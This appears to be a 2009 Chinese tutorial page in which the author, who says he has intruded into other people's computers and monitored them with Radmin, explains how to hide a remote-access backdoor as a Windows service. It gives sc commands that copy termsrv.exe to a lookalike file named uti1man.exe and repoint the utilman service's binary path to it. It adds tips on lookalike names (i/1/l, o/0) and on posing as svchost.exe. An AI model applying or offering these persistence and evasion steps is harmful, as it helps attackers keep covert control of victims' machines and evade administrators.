当前位置: 首页 > 图文教程 > 网络安全 > 安全基础 > 服务的隐藏

安全基础
IE浏览器防黑十大秘籍,黑客也没招
网络工程师讲解系统安全漏洞的形成和防治
清除导致XP系统反复重启的新网银木马
识破QQ欺骗网络地址的几种方法汇总
安全基础知识 细说暴库的原理与方法
排除无线突然中断故障实例
强搜天线 搜出WiFi世界的安全漏洞
网管应用技巧 内网安全十大策略说明
如何修改局域网内部打印机的IP地址
如何找出IIS中隐藏的网站
EFS加密技术的概念分析及一次解密经过
提高Windows XP系统安全性要关闭的10种服务
PHPBB 2.0.22 MOD版最新注入漏洞
修复Windows系统忘记密码的9个高招
用SockOnline软件轻松突破端口限制
安全基础知识 最强0到33600端口详解
执行文件方式加密FLASH文件的解密方法
网吧被入侵后的应对解决方法
网页“黑手”如何攻击你的Windows系统
不要让别人读了你的信 谈私密数据保护

安全基础 中的 服务的隐藏


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-10-28   浏览: 55 ::
收藏到网摘: n/a

好久没有所谓技术性的东西了,最近进人家的机器用Radmin监视人家发现现在一般的网管都会检查用户和进程(不过那个任务管理器不知道为什么不能用了,知道有木马都杀不了,不知道Windows怎么搞的),所以手脚就要在这个上面做了。
先自己详细的看下默认的Windows服务

替换或者时注意的问题

1 依存关系
2 二进制路径
3 默认启动还是自动

我靠,还可以在服务管理器里更改说明。

C:\WINNT\system32>copy termsrv.exe .\uti1man.exe
copy termsrv.exe .\uti1man.exe
已复制 1 个文件。


C:\WINNT\system>sc config utilman start= auto
sc config utilman start= auto
[SC] ChangeServiceConfig SUCCESS

C:\WINNT\system>sc config utilman binpath= C:\WINNT\System32\Uti1Man.exe
sc config utilman binpath= C:\WINNT\System32\Uti1Man.exe
[SC] ChangeServiceConfig SUCCESS

至于该替换哪个,我不说啊。最郁闷的是那个Performance Logs and Alerts
和c:\winnt\system\smlogsvc.exe /service
替换Radmin后,明明是禁止的,可是居然端口还等着连接。汗!
只要条件符合,几乎发现不了,除非也是高手。还有就是名字的要求,i与1与l,o与0,呵呵~~
自己发挥啊,很多的svchost.exe也没有人会怀疑吧~~~

说这么多了,自己研究去,很好玩的啊~~~~